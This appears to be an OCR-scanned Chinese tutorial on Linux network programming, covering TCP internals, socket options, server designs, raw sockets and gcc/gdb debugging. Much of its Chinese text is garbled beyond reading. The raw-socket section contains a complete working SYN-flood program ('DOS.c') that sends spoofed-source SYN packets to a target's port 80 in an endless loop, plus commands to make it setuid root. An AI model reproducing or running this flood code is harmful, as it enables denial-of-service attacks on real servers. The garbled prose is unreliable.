rst b 1 (I, RN SR TS

syn 24 1 I 2 i SR g LI R

fin 4 1 (IR, 27 o O P % 2

window % 1, #5 el T LA R/

check X TCP $is AT 4%

urg_ptr WA urg=1, B4 45 th & S0 T 17 L AR 4R 10741 5 MR

KT TCP HhsUI P40 1 L, i & RFC793

7.6 TCP AL

TCP W3R — il & (W3 HE, O T ARUEZESR 1) W] S50, TCP IR ZL 4 0 JLAS P IR AT 1K
AR AR R = AR T

N HTFRAT A AN S 3 AT S R R

SR PRI RS B3 R 1% A TCP Bdi 0, Ron i SR e, i, 55 7 st ¥ H00308 4 1)

SYN {7 e85 h 1,9 H k8 /7515 seq=1000(FK A1 % 4 1000).

SOD RS AR T R AL, I AN SYN A7 1 AN K A — AN LU R I Bz T R 45 2l

I0) 7% 3 3% A TCP 254 .. IR 2 2 P LK 3K, TR IR G5 28 & ACK 4 1,sak_se

g=1001(1000+1) [ & & H 17515 .seq=2000(F A1 % A 2000).

FEPR P HUCE T RS A5 I TCP I ACK 1 il ack_seq=1001 HIT& /& MRS 35 K HITHIA

BRI R AR RS 28 KL S B & P HLEE ACK=1,A ack_seq=2001,seq=100

1, RIBL MRS 2% 28 ML 7 bty 5 S 2.

a0 s 85 32 BIAME 1 e R B2

W BT JUANPER, A TCOP St T AR i ar i R v vl i HR IR A %, AN i TCP st

AT LLRIE O 25 b FRAT 1R 1.

YL — B A I — PSR

Wr 53k DOS Meh 2RI AN AL 4 A ZR GEIT ) A4 2 1 1A 6k, 58 1T 18 K I 3l — b 52 380 ks g

& H IR & DOSHEARUIRSS) Jr U ERG (Ui Jr 2.

BT 88— AN D BRI SS 2 R J5 AT 35 AP R AR JROE R 1) TCP 182, % ) hL

NZRAT S = AD IR,

AN Bt # S by BT S = AN IR N % P AR AT 5 — AN P IRI 15 50T B

CUH 1P ik, 3 Yookt — AN 92bn ASFEAE R 1P R 7E B C 1P S i Rk 1 1P — 23X

FEDR A IR 55 25 A 1) 1P ikl e A7 N H2e, Jit LUIR 55 3t 23 WOAS 2158 = AN D IRIGI IS =5 Xk

Mk 5525 B o A0 AR — B A5 A, EL BRI

R A R S SRS g5 i o A 8 S A, L 30 A 1) B DA D D', T AN R 1

FO& LI K.

XFE Y EH P ) g% 38 A B SR IS, B T8 T PHUR M AN B R ). Tt B T 419

I BT H B L.

I 4% G 72 (8)
8. BEH: TR

A IR BATEE B T 14T 2 (B 22 v DX RN, IS I AT Tl 47 T B4 7 1Y)
HIRT
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8.1 getsockopt F1 setsockopt

int getsockopt(int sockfd,int level,int optname,void *optval,socklen_t *optl

en)

int setsockopt(int sockfd,int level,int optname,const void *optval,socklen_t

*optlen)

level fif & #2137 1 2 AT A=A i - 1)SOL_SOCKET: 3l H &4 72k 1t 2)IPPRO
TO_IP:IP 3T, 3)IPPROTO_TCP:TCP i,

optname $i3 52 #2777 U (IR 44 FR), AT i 4 g ke

optval KA e BB B T I AR e 3544 Pk 1) et 2 A A T 4 4

EIAFR Y] B

SOL_SOCKET

SO_BROADCAST ¥ Ai%) #&%dh int
SO_DEBUG #f¥Fiffi int

SO _DONTROUTE A&k int
SO_ERROR 33 EHFHR int
SO_KEEPALIVE ff#7&#H: int

SO_LINGER #EIR %R struct linge

.

SO_OOBINLINE i /MG N 1 H B int
SO_RCVBUF #:IZZ X K/ int
SO_SNDBUF A IEZZh X K/ int
SO_RCVLOWAT FZEph X TR int
SO_SNDLOWAT Ki(ZEphX TR int
SO_RCVTIMEO #:W( ] struct timev

al

SO_SNDTIMEO &I%#EHt struct timev

al

SO_REUSERADDR o1 5 A M Mkl Flvs 11 int
SO_TYPE 3AEREFIA int
SO_BSDCOMPAT 5 BSD R4tHf4F int

IPPROTO_IP

IP_HDRINCL 7Rt a8 1P B3 int
IP_OPTINOS IP ¥ #5iET5 int

IP_TOS 452

IP_TTL AEA7HTE] int

IPPRO_TCP
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TCP_MAXSEG TCP 5 K¥ B /N int
TCP_NODELAY AMiiH Nagle 532 int

FeFIX LR IT K BN TS A Linux Programmer's Manual

8.2 ioctl

ioct! AJ LA T AT (0 SCAF AR A7 (KA 0, 3% LA 41— TR 4 e 7 g ik .
int ioctl(int fd,int req,...)

ioctl F 42535 15

SIOCATMARK &1 #lik 7 #Mwid int
FIOASYNC S AN/Hitibnas int
FIONREAD £% X AT e 15 4% int

PEAI LT man ioctl_list &5 .

4 22% 44 72 (9)

9. Migs EpaY

PR (AR WA TR AT ANRR P D R TR 0 AR B AT 27 > i
VAR ER . AR F BT, BT R ok A TR PR A S 27 > o 296 S it FE) S AL
FEFAVGREFF 1T, BATHR N2 A R 1 1 R 2 BATT AR I FAT T B e
MIRCEA 2. AE RISy L, — BRI SR UL AL VF 22 20 P LR N — ANk 5 8l T A0

P LINESR, AR AR RO R AR T REHRI SR 0139 — F T P 105 2%
B,

TR R S5 45% AE IR 55 S A [ — AN 220 ORI R 3 — A% 7 3 PR 1 5K
IR MRS 2 IR R S5 ARAETR]— A I 220 AT LAy [ 22 A% 7 S ) 1 5K
9.1 fFAIIRSS #5:UDP o5 4%

UDP i FA 55 4% (K S B AR 18 5 UDP JI 9% g Bk I N 7 B A3 i R 15 5K, b B
N E P ST IRN N

GV RN AS S5

socket(...);

bind(...);

while(1)

{

recvfrom(...);

process(...);

sendto(...);
}
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[KI 24 UDP s Al 1 ) 45 (1, A — A% 7 3 Al LA B AR IR S5 o, LS Ab B AN 2 S
R, RGS TR TR AN P LRI SR L2 BE N Tl 2

9.2 fiFHAIRSS %% TCP iRk 55 4%

TCP (IR IS5 & (1 S BURANAETCP JIR 55 84552 AN %) i IR £ AR AL BE, 58 i 1 XA %
ST SR G BT .

ERGRIN

socket(...);

bind(...);

listen(...);

while(1)

{

accept(...);

while(1)

{

read(...);

process(...);

write(...);

}

close(...);

}

TCP JEH 55 % — A BEAL B —AN 2 7 3 )33 SR U AEIZAN B P 1) A SR A AL )5
JIR 55 i A4 i AGREE 5 1 037 SR IXAE AU RAT — AN B 7 i o A IR G5 A AN SO, R R A L
FARELAET R, TCP IR%5 25 MRAR 2> G4 IR 55 28 AL 1.

9.3 JFR RS &5 TCP fiRk 55 s

H T URAMIEER TCP IR 55 28 ISR B, AT SUAR T IR R IR 25 38 AR AY . JF R IR 4528 1 JEAR 2
NP HURTE R IT AN IR S5 28 B AL 2, 2 IR 4528 G — A~ THbREk AL 2.
AP/

socket(...);

bind(...);

listen(...);

while(1)

{

accept(...);

if(fork(..)==0)

{

while(1)

{

read(...);

process(...);

write(...);

}

close(...);

exit(...);

}
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close(...);
}

TCP JF A M5 % vl LA R TCP JEFA IR 55 2 2 P DUy JIR 45 s O G L. AN it )iy ok 17—
AN T L A T WS 2% LIRS S IR 55 A S G T BERER AR B A TRk —
TP A T A B U R A

9.4 JFRIRSS & 2 B AT 1/0

N T R T HERE A R IR RGBT E RE, AT SRR T 2 B S I 1/0 A,

H e/ A~ 4L select

int select(int nfds,fd_set *readfds,fd_set *writefds,

fd_set *except fds,struct timeval *timeout)

void FD_SET (int fd,fd_set *fdset)

void FD_CLR(int fd,fd_set *fdset)

void FD_ZERO(fd_set *fdset)

int FD_ISSET(int fd,fd_set *fdset)

R R U A FRATILE k) SO IS R AT W RE AR S HHBALZE, B B A L. L
INFRATTN AN B ER I, w] B2 DX L A 2 vl 132 GRLAR RO T e st
i ke) XA I A5 FRATT 1132 VA 3t o S5 A5 (BRLZE) B 30 B v e W SRR AT TS 75 SR B 28
AT — MR select RGEH]. N EIRA T E LS select AN H M4 2430
AT LA T (W IN5 select [0 A0 ATT BT LA T . readfds Jir BB I8 SCAF SO AR
Gk ey

writefds T 2 ) 5 SO SR RIS &

exceptfds oA i) I 2 1) AT S ) SCATHR T

timeout ¥ .

nfds T BATTHE I I SCAF R A5 o B KA —M i 1

LEFATH I select I BERE 2 — B ZE H B LA N — Mg Otk 2L, 1)A S0 AT BAiE.2) 30
1] LS 3)8 I Fr 150 L (1 1] [ ).

N T BCESAR T BATEAL A LA FD_SET #4 fd A 2| fdset

FD_CLR ¥4 fd M\ fdset FLTHI BR

FD_ZERO M fdset "H13i BRI A (1 SCAF R 17

FD_ISSET Hlb fd &£ 75 7E fdset £ 4

£ 1] select f1—Mi 1

int use_select(int *readfd,int n)

{

fd_set my_readfd;

int maxfd;

inti;

maxfd=readfd[0];

for(i=1;i<n;i++)

if(readfd[i]>maxfd) maxfd=readfd[i];

while(1)

{

7 BB RSO IR R IA >/

FD_ZERO(&my_readfd);

for(i=0;i<n;i++)
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FD_SET(readfd[i],*my_readfd);

/> HFERHIE */

select(maxfd+1,& my_readfd,NULL,NULL,NULL);

/* ARG RLASE T */

for(i=0;i<n;i++)

if(FD_ISSET (readfd[i],&my_readfd))

{

7 JERGEF AT LA T */

we_read(readfd[i]);

}

}

}

i1 select 5 AT IR 55 2 R AR 1 T

WIUA1E (socket,bind, listen);

while(1)

{

BEE MBS SOAHIA T (FD_*);

] select;

Up SRR B T A U B R R SR g T

{

AT % (accept);

TN BN T SOl R b 25

}

32— A @ R 4

{

WATEAE (read B4 write);

}

}

Z W% S H 1/0 W] LU o 8 U B A 1) o) RS ASE A SIZ s b ik UDP AR AR HAE T TCP R T
AR T — L8 ) LW B T RS AR AR B 7 s Sk T LA R S B IR T &
SERFRA

9.5 Jf A5 a5 :UDP [IRg5 4%

NATHE IR H% & T UDP A8 2] 7 9 & UDP IRSS#RAEMY. Jf & UDP IR 45 A5 284 1L 51 2 i
(R AN IR TCP JIRSS 23R — A2 B — N TSR AR BRI BRI R K TCP M —4%:

B AR IR 25 20 AL B 5 7= i 1) 375 S T TR I T B A BAA, AT 52 B AR /0 REX AR Y
9.6 —MFK TCP R4 35 5451

#include <sys/socket.h>

#include <sys/types.h>

#include <netinet/in.h>

#include <string.h>

#include <errno.h>

#define MY_PORT 8888

int main(int argc ,char **argv)
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{

int listen_fd,accept_fd;

struct sockaddr_in client_addr;

int n;
if((listen_fd=socket(AF_INET,SOCK_STREAM,0))<0)
{

printf(“Socket Error:%s\n\a”,strerror(errno));
exit(1);

}

bzero(&client_addr,sizeof(struct sockaddr_in));
client_addr.sin_family=AF_INET;
client_addr.sin_port=htons(MY_PORT);
client_addr.sin_addr.s_addr=htonl(INADDR_ANY);
n=1;

7 USRI ST AR 1L 55 s AT LASE bR ST AN A Ay — BN ) */
setsockopt(listen_fd,SOL_SOCKET,SO_REUSEADDR, &n,sizeof(int));
if(bind(listen_fd,(struct sockaddr *)&client_addr,sizeof(client_addr))<0)
{

printf(“Bind Error:%s\n\a”,strerror(errno));
exit(1);

}

listen(listen_fd,5);

while(1)

{

accept_fd=accept(listen_fd,NULL,NULL);
if((accept_fd<0)&&(errno==EINTR))

continue;

else if(accept_fd<0)

{

printf(“Accept Error:%s\n\a”,strerror(errno));
continue;

}

if((n=fork())==0)

{

[ THEREAL B S R </

char buffer[1024];

close(listen_fd);

n=read(accept_fd,buffer,1024);
write(accept_fd,buffer,n);

close(accept_fd);

exit(0);

}

else if(n<0)

printf(“Fork Error:%s\n\a”,strerror(errno));
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close(accept_fd);

}

}

PRn] LA BATTHITH 5 2 i A 2R A R 7 B 2 HK telnet I

I 25 4 F£(10)

10. BT

PAVERTTN A2 2 1 T PSR 7 I P Fh £ 42 7-(SOCK_STREAM,SOCK_DRAGM).7EiX — 3
HUFRAT kA 2 Ty A P - JR AR 4 T (SOCK_RAW). W ] st e 7 JkAi T ml
DA% T HH B TCP A1 UDP B~ AN Rei s BLIM Dhfe. 1 R dh B KB 4G root ALFR (1)
PNz

10.1 JRipE A

int sockfd(AF_INET,SOCK_RAW,protocol)

AT LA AN SR e AR D BRI FRAT T AT A B AN [ B ¥ S b e 7 L
41:IPPROTO_ICMP,IPPROTO_TCP,IPPROTO_UDP 2545 $£41 15 A H <netinet/in.h> T
THIFATT LA S5 K U6 W B AR 47 10 B i R At

10.2 — RIS

Eid A} DOS A4 i I 2R HLRAT Tk — ke 5 — AN DOS /NP, R ISR
A

/ Hokk DOS.c /

#include <sys/socket.h>

#include <netinet/in.h>

#include <netinet/ip.h>

#include <netinet/tcp.h>

#include <stdlib.h>

#include <errno.h>

#include <unistd.h>

#include <stdio.h>

#include <netdb.h>

#define DESTPORT 80 /* &Ml i3 1 (WEB) */
#define LOCALPORT 8888

void send_tcp(int sockfd,struct sockaddr_in *addr);
unsigned short check_sum(unsigned short *addr,int len);
int main(int argc,char **argv)

{

int sockfd;

struct sockaddr_in addr;

struct hostent *host;

int on=1;

if(argcl=2)

{

fprintf(stderr,”"Usage:%s hostname\n\a”,argv[0]);
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exit(1);

}

bzero(&addr,sizeof(struct sockaddr_in));
addr.sin_family=AF_INET;

addr.sin_port=htons(DESTPORT);
if(inet_aton(argv[1],&addr.sin_addr)==0)

{

host=gethostbyname(argv[1]);

if(host==NULL)

{

fprintf(stderr,”HostName Error:%s\n\a”,hstrerror(h_errno));
exit(1);

}

addr.sin_addr=*(struct in_addr *)(host->h_addr_list[0]);

}

[**** A§ii] IPPROTO_TCP G 4> TCP [{Jsl gty ****/
sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP);
if(sockfd<0)

{

fprintf(stderr,”Socket Error:%s\n\a”,strerror(errno));

exit(1);

}

[k R 1P R AR S, VR R G AL 1P B AT A CORIEE e/
setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on));
[ BT IR, RN R T A 0] DS T IR AR o ok f
setuid(getpid());

[k RN I Rk

send_tcp(sockfd,&addr);

}

o REERLIGEIL *eomesssf

void send_tcp(int sockfd,struct sockaddr_in *addr)

{

char buffer[100]; /**** FKIECE RN B (L ****/

struct ip *ip;

struct tcphdr *tcp;

int head_len;

[ AT R A0 SE bR b B AR AT A A T A B sl e P A G5 A RG>/
head_len=sizeof(struct ip)+sizeof(struct tcphdr);
bzero(buffer,100);

frosxsss TR AP HH AL Sk A, IR AL AT IP (R Skpg s p xxwrax/
ip=(struct ip *)buffer;

ip->ip_v=IPVERSION; /** FA— 12 4 **/
ip->ip_hl=sizeof(struct ip)>>2; /** IP 3t (KKK EE **/
ip->ip_tos=0; /** g5y **/
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ip->ip_len=htons(head_len); /** IP AL **/
ip->ip_id=0; /** ik KRG FIHG **/

ip->ip_off=0; /** F1_L—#F, & A **/
ip->ip_ttI=MAXTTL; /** KPR 255 **/
ip->ip_p=IPPROTO_TCP; /** A IZ R TCP {1 **/
ip->ip_sum=0; /** Ik KRG M **/
ip->ip_dst=addr->sin_addr; /** A 1BEHIR G **/
[roddxx JEARIEE TCP ity *****/

tcp=(struct tcphdr *)(buffer +sizeof(struct ip));
tcp->source=htons(LOCALPORT);
tcp->dest=addr->sin_port; /** HHii 0 **/
tcp-=>seg=random();

tcp->ack_seq=0;

tcp->doff=5;

tep->syn=1; /** REE TR >/

tcp->check=0;

1 G T UM T RS B IRUE R I T B2 NN *
while(1)

{

1% ARANENTE T IR HLA D, M1 1) 2 5L >/
ip->ip_src.s_addr=random();

1 AP ARG T BB 2RI R LIS TRATT B R SR */
[ RIS RG>/
tep->check=check_sum((unsigned short *)tcp,
sizeof(struct tcphdr));
sendto(sockfd,buffer,head_len,0,addr,sizeof(struct sockaddr_in));
}

}

VAl TP = i1 s o o = R g [N )

unsigned short check_sum(unsigned short *addr,int len)
{

register int nleft=len;

register int sum=0;

register short *w=addr;

short answer=0;

while(nleft>1)

{

sum—+=*w-++;

nleft-=2;

}

if(nleft==1)

{

*(unsigned char *)(&answer)=*(unsigned char *)w;

sum-+=answer;
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}
sum=(sum=>>16)+(sum&O0xffff);
sum+=(sum>>16);
answer=~sum;
return(answer);
}
i1k — T, % localhost i — T S50, BHR A1 A8 B (T I AREAR B PIW). 4 T ik%
PR LIS AT XA R, AT AR XA R R BT A2 h root, H BCE setuid £i7
[root@hoyt /root]#chown root DOS
[root@hoyt /root]#chmod +s DOS
10.3 B4

SRR AN — MR BT R0 2 LARTVF 2 B R G s IR ZE s 3RAT A R T
o ALK RN EGRZ R, SIRATEIE T — A TCP 4~ (W, T U2 £t
TR TE RIL I A 25 (buffer) (L s T ARG, REATWBIBATEEE S, 15 B 3 %7 H
A, PR 5 J n - TCP Sk, AR J5 b 1P S, TR I H 2 e 2 FRAT T B B 4%
ARSI, RGE R RITEAVRE . 78 RSB, BT BRATEE SBATIE 1P bl
JITLATRAEH T setsockopt b4, W R ERAT] U A& 550 TCP 45t B4 1P s —FEtn LU e
RGN,

o 22% 4 e (11)

11. j5id

BETER T MR FEX A FRE R R EAZ S T — A, 5k U 5 1A W 1% A2
A ASHE R GRS SR A I JEUORAT AR 22 1) Ml 5 8 Ll AR S I B FRIE AR 2 1) R PG
AW AL S 58 T IR B LA B SO W4 AR SR n T —

R AT UGS — M) 4R Pl 2 LA 2 5 1 AR I SR B AT VA S H LA 1 1Y
RPBA LG AR BT, MR — Mok B2 2 RN B2 26 R 0 h T 4k
PRI AATT N B IR O R, BRATTIE B2 3] RERE R (Rl A AT 28 B 7 B B VT 2 2 IR
A I BATIE B 2227 2 B ) SRR PR BLAE (5 BBk T 00 T Ak 3
TP (5 B BRI B 2 S B e . i R B S AT ) S, BA D B 2 R 4%
Tl 14 285 DAL 2 BRAT T2 AR PR IR 2 AR 2

F B SNE WA KT B B A KO, 58 S IR, R BRI K
AT AR G2 il T A AR B FRATTIRAE FH IR A LA R AT N 8 O
5.

AN R AT, A O LB TRA T T W38 e s AT FA TR A I 2280, 3
TS A, BETa AT IR A A BRI 5% ) A EC I 222 5 RN T — € Re s 2 4 1)
SEATE AT U B BB A

ARE — A

ST AR TR BATT—HE 7T LA, i B AT DA B A 5 4

FEUGFER N, T BAVH AL =, A T 40 6 AR K, %% 710 2 A S ne A
SRR

hoyt

11.1 %%k
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<<SZH UNIX g >>--- LIk Tk H st
<<Linux P4 2% g fit >3 He K2 HA SRR

9)Linux N C FFR TEAH

Linu 9B TR 6055 T AR ARAETF R L B AIH AR RFIT C I CrrRifIAR I
. ASCAPEITE Linux FAREIT C RIRERIF R MBI TH. A SO B A4t
FIE Linux FAEF C G aeRIILts C Gif LI, Mk C V2GR AL,

GNU C %ii¥as

GNU C #iF28(GCC) /& M4 ThfEl) ANSI C FRALm R 3. 1 BRARE HAbIRAE R S i
& LR —Fr C s, IREAEIRIULAESE GCC. AR AT/l GCC 4t
GCC %28 fe F ML TIL.

i GCC
A S5 R LSBT SR 4 kAT GCC Zmiksd. gee dr A MIEA i R

gcc [options] [filenames]
AT AT IRINEE & IR AR 4T BN RIS BT, /NI RGR — Sk ss iR
G AR

GCC T

GCC AT 100 MMt ny . XS I rh (lF 2R Rk is #A s B, H-—Le
BEIETUR B 2. IRZ 1) GCC IEIALHE— A LA R 745, DA AR 6 200 Ay F AN Tt
e & AMETR, JEHMSARZE Linux fird—FERABEE— A 00 I 2R JF IR —

YUEI. i, T P A A AR

gee -p -g test.c
gee -pg test.c
4w AR GCC 4ni¥ test.c Iy prof fir A 7 3IHT (profile) (s B HAL MRS

SIMAZIRTHATIOSCAR L. 5 —Jk & KA I GCC 4 gprof fir & T &

AR HUEATIE I PE—MEFIN, GCC K S (BUE e iy) — 440 a.out W]
PATICHE. B, TR a4 AR 21T H A acout S0P

gee test.c
PREEF] -0 Gk IR A f 7= A i rl B AT SRR B — N B R A acout. B, K —
MY count.c B C FEFESMBEN4N count FRIHATSCAE, VRN R T 4

gcc -o count count.c
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R MR -0 LI, -0 J& AU — A4,

GCC [FIFEA 45 g 1F A5 AL B 22 /D (R PRI T -¢ JEIE IF GCC AT IS 4 e H AR
BT RV g AR R IR XA AR IR RO E MBI 24> C R
JESEARIF H A 5 TAF L SR GCC @A H US> .o Y 4.

-S ZPFILIUE R GCC A C AU A TG iE & SR 1k 4 7. GCC 7™ AR I g iF
HOIAFIEE Y A s . -E IEIUR RGN PE A OO A SO AT FRAR B, 51X A
WAL RTINS, TRUAL B 35 A0 i EE B SRR AR 0 AN A A7 A5 SO I

A AR

HRH GCC ik C ARSI, &2 il F e/ (KIS 18] 52 1o 136 5 ELAE S 25 5 A 2 T
. 5 TIORGOS 5 AR A R R AT IR, e ROARS e Ay 2

. AR Z LA HY T35k GCC FEAE 3l 5 22 2 15 I () RVATGE 2 T il e (R e iy A 5/

SRR AT AT SO, XL I P i ML) 2-0 AT -02 LI

-0 I F GCC XA REATHEAIAL. XM AR 2 B I #2 AR PP A T R 5
PR, -02 IR GCC AL AT g /NS AT BRI, 02 2L IGURE (25 13 ) 1 B2 LA
HI -0 I, (HEH A A AT L 2 T

BrT -0 Fi -02 fLAbktitsh, b — LRI 17 AR R A AR . I LR I )
R, T LB I AT R 58 4 BRI Sk 0K 2 0] 4 1 I (KD ARRE ™ A A AR RECR I 425
. IXLeE IR VRN fIE, WS % GCC RIFRMI L, fEmr24T LB man gec .

YRR AT 1% 15

GCC SCHFHUPh R AT RE T, 73X SUe 1 F Ak 2> B v B2 -g A1 -pg BRI

-g IR GCC M AERERE GNU A H 1 i Bl B LME R 2 7. GCC 4@t T
—AMREZ AL C iR EE, 48 GCC BLARAEME -g A1 -O (A ALAHD )]
o BX S A DRA AR R A B 2 RO AT REAHAE A 0 PR R I AR A, ZE AR [ IR
FHIZ AN 0 VR 20000 48 VR BT 5 1 S 28RS DA FEL A 3 GCC 1E T 2edl. X F iRk
C BFME 2 5 WS F—1H gdb ik C #F”.

-pg EIEVR GCC EMR IR F NSNS, $ATI, 74 gprof I {5 B LA
SRURIREEF AR TS 00, % T gprof M £(58iES % “gprof” —5.

Hl gdb X GCC /¥

Linux 7% 74 gdb ) GNU iR FEE. gdb 2N C F1 C++ BTN
TS, E A URREAE R P IS AT IN LSRR K S A R N A2 AT A . LU 2 gdb i
PRAL— L T g

BTR BB MR RS AR R A
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E AR AE BB WA LU P AE 1 2 AOACREAT A kBT
EAEURRE —ATAT AT IR AR,

fEAT AT LN gdb Il =g st nl LUZ2AT gdb T, W VNER RILE, gdb H5E R 3l
I ELARREAE B L7 SRR P 4

GNU gdb 5.0

Copyright 2000 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type “show copying” to see the conditions.

There is absolutely no warranty for GDB. Type “show warranty” for details.
This GDB was configured as “i386-redhat-linux”.

(gdb)
ARAB) gdb Ja, IREEAER AT ERE R I . R T ALL R i 77 kg AT gdb

gdb <fname>

MARX AT RIZAT gdb , URAEE PR e B TRAN R T, K5 UF gdb REAZ N
fname A PHAT AR, RABATLAA gdb G & —ANEFR 3 5 £k =42 core SCAF,
B S AMEAEIBAT MR FAIE. fRnf 2% gdb 48R ILEIEM 44T LA gdb -h 75
BN OCIX LR IR () 35 W 1 TR SR 81 3K

R4 348 (Compiling Code for Debugging)

N TAE gdb IEW AR, VRAUE VR FAE S P I B UE R IS B A R R
L RRAAR T SR RIAE AT AT SO B btk S DL IRARES (475 . gdb I X 2645
AT ACH AL 2RI AH DG IR,

FEGPEIN AT -g LEI04T TR 3k .

gdb FEAMA

gdb SZHFFIR 2 [y A AE AR RE SIS R R Th . I A MATRT B 10 SO N B AR VIR £ i
W AR N R R A, R 270 50 TARTEA gdb PRI S — i 4. AT
fit gdb FIVEAIEHTIE S gdb [HRRI L.

K gdb 4.

file 2% NAHZLYERA A vl AT 3CAF

kill 1R 1E7E R FR T

list %1 th 7 A= AT SCAFIRIUSAR RS 11— 43
next ST AT IEARADAEASTIE N B 2P 5.
step $AT—ATIRACRD I FLIE 0 5P 5.
run $AT TR R

¥ 071 70 3k 84

=



Linux #:E RS F c il S aifE ]

quit #15- gdb

watch APk AE LA 78 e 10 {0 7 AN A T e

print 7R3k A ME

break 7EACHS B E W R, BOKAIRR AT B3 BN Bl
make {fURAEAIEH gdb T LB A4 nl A7 S
shell RAEAREITT gdb HiPAT UNIX shell 4.

gdb ZHHRZ Y5 UNIX shell F2)7—FERIa 2 gnfHAr it RAERAE bash B tesh HIBF:
% Tab ##il gdb FARENT—ADME—Mdr 4, WRAME—LE gdb 51 H T VLR 1y
A RUEE bR LR RIS ) a4

gdb 284
AT —ASEBIEAR 5010 gdb PRARET. # RO RE P A, (SRR T
gdb LI .

B TR AT R hello, B BoR—ANE R R, TR
FPAE A .

#include <stdio.h>

static void my_print (char *);
static void my_print2 (char *);

main ()

{

char my_string[] = “hello world!”;
my_print (my_string);

my_print2 (my_string);

}

void my_print (char *string)

{
printf (“The string is %s “, string);

}

void my_print2 (char *string)
{
char *string2;

int size, i;

size = strlen (string);
string2 = (char *) malloc (size + 1);
for (i = 0; i < size; i++)

string2[size - i] = string[i];
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string2[size+1] =

printf (“The string printed backward is %s “, string2);

}
P T ) i 4 i 1

gce -g -0 hello hello.c
BEAFEF AT I Bon i T 455
../hello

The string is hello world!

The string printed backward is
i LY 2R — AT TR, (S TATST B AR VE IR AR IA IR R . JRAT T BEAR R L
INAEPSH

The string printed backward is !dlrow olleh
H AL ], my_print2 RO TEH AR, ibIRAIN gdb B i T3 AR L
SEBENUNT Ay 4

gdb hello

AR AR TE hello B3 I IR T I

MR A A S T ERR R E N S 5%4s gdb, R LAZE gdb $2R7F FH
file M4k ANE:

(gdb) file hello
AR N hello ATRAT U R ARTE gdb AT AT AN S FE.

XHHREEFH gdb B run @r4Ki2T hello 7. e gdb BT EEGR KA ELX
FE:

(gdb) run

Starting program: /root/hello

The string is hello world!
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The string printed backward is

Program exited with code 040

XA AL gdb AMISAT SRR S, A A ST RN TAE? N T ki
SELEITAE, FATATCAE my_print2 pREUY for 1EA)E R — NI, RARMIMGLZEAE gdb
FERFTRREN list i =k, F1 A

(gdb) list

(gdb) list

(gdb) list

i35 £ gdb $RFT R REI R EE B

VBN list dr AT

1 #include <stdio.h>

2

3 static void my_print (char *);

4 static void my_print2 (char *);

5

6 main ()

7{

8 char my_string[] = “hello world!”;
9 my_print (my_string);

10 my_print2 (my_string);

WAL R4, gdb R FFRAT IR list fd, gl R AT

11}

12

13 void my_print (char *string)

14 {

15 printf (“The string is %s “, string);
16}

17

18 void my_print2 (char *string)
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19 {
20 char *string2;
Az — KBS L hello FEFPI0FRI 43345 -

21 int size, i;

22

23 size = strlen (string);

24 string2 = (char *) malloc (size + 1);

25 for (i = 0; i < size; i++)

26 string2[size - i] = string[i];

27 string2[size+1] = ";

28

29 printf (“The string printed backward is %s “, string2);
30}

MRS UL, RAEFR BB ST 7ESS 26 1T, /& gdb fir AT AT M
iR T A

(gdb) break 26
gdb KR AN B mE A :

Breakpoint 1 at 0x804857c: file hello.c, line 26.

(gdb)

PAERSEN run fird, B 2R RS

Starting program: /root/hello

The string is hello world!

Breakpoint 1, my_print2 (string=0xbffffab0 “hello world!”) at hello.c:26

26 string2[size - i] = string[i];

Preedid WE M EE string2[size - i] A& E G SORE A DO BRI,

AN

(gdb) watch string2[size - i]
gdb K AEH AR R

Hardware watchpoint 2: string2[size - i]
BERT AT next &k — L HI4RAT for 7834 T :

(gdb) next
25 5 RAEER S, gdb 5 VRFRAT string2[size - i] MEZE Th™. gdb I R ER

SRR
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Hardware watchpoint 2: string2[size - i]

Old value = 0 '00'

New value = 104 'h’

my_print2 (string=0xbffffab0 “hello world!”) at hello.c:25

25 for (i = 0; i < size; i++)

AMEIE RN, Rk B IERR R4 R BRI, 2 =11 i), Rk
string2[size - i] MHZET 17, size - i FEST 1, BE—NEFCEHE IS
By,

WERRFHEIRIA T T 2, RSB/ RICARAHAACS string2[0] T, 1 E/2H H i1
B AT, PO malloc B RS BC A AF IHE EATIRIAA A 25 (null) 74 . BT
string2 (K55 — AN FROEE TR XMRE T O AAESTED string2 I BRI T

WAESRE T M AR, BIEXAHIRERAES N, RFIEMRBES N string2 15
— NI R RN size - 1 TR size. IXAERA string2 [/ 12, H
EIAmEEL 0, PNMTFIMNmMER 0 8 MR 10, MR 11 AT 7R,

BOE T AR 1 5. I I e 00 A0

#include <stdio.h>

static void my_print (char *);
static void my_print2 (char *);

main ()

{

char my_string[] = “hello world!”;
my_print (my_string);

my_print2 (my_string);

}

void my_print (char *string)

{
printf (“The string is %s “, string);

}

void my_print2 (char *string)
{

char *string2;

int size, i;

size = strlen (string);
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string2 = (char *) malloc (size + 1);
for (i =0; i < size; i++)
string2[size -1 - i] = string[i];
string2[size] = ";

printf (“The string printed backward is %s “, string2);

}

W4T core 30, RILAA gdb hello core fir & R A& F 2 PR Ak A . WI7E B3
my_print2()4, WL T 4 string2 4 EL AT string2 = (char *) malloc (size +

1);, IR RERL<s core dump.

FAME C g TR

xxgdb

xxgdb j& gdb [—A3ET X Window RZMIKITESLIH. xxgdb B 74471 gdb
LT REE. xxgdb ARG AR AT R A 4. a7 W7 AU 7 U 1
JEK IR,

PREEAE—AN Xterm & VBN T H a2 KIZ1TE:

xxgdb
fRaEM gdb BTG B iy AT IORMIAA ML xxgdb . #EAh xxgdb A —LERHAT [ iy
RATIRIN, % 27.2 FIH T IXEERLI0.

F 27.2. xxgdb A ATIETN.

ST Y

db_name & T HRRA 4T, B2 gdb.

db_prompt Fi& & XA LR A, B4 gdb.

gdbinit #&EVILAN gdb 1A A SCAFISCIE4, B4 .gdbinit.

nx 2k xxgdb AAT .gdbinit S
bigicon f#H K& 45,

calls

YRETLAZE sunsite.unc.edu FTP ¥k & T T [ 8 1%

/pub/Linux/devel/lang/c/calls.tar.Z

KIEAF calls, —Y4[HMA Linux CD-ROM RATHE A w6, B &k— 4
TH, BAMERR RN F. W34 s, M BBS, FTP, ui)—5K CD-ROM I
AL calls 1] GCC HIFIAL FILEF A AL I LS Y HOUERE SO, AR5 it X 2e ST
f18) FELTH) R BT FH AR )

HE: FERRS 222k calls,, UGB P G085 53T RS E: 1. gk
untar 3CfF. 2. cd HEA calls untar JEESZH T HR. 3. 84N calls (I3

77 W J: o84



Linux #1E RS T c iES AN

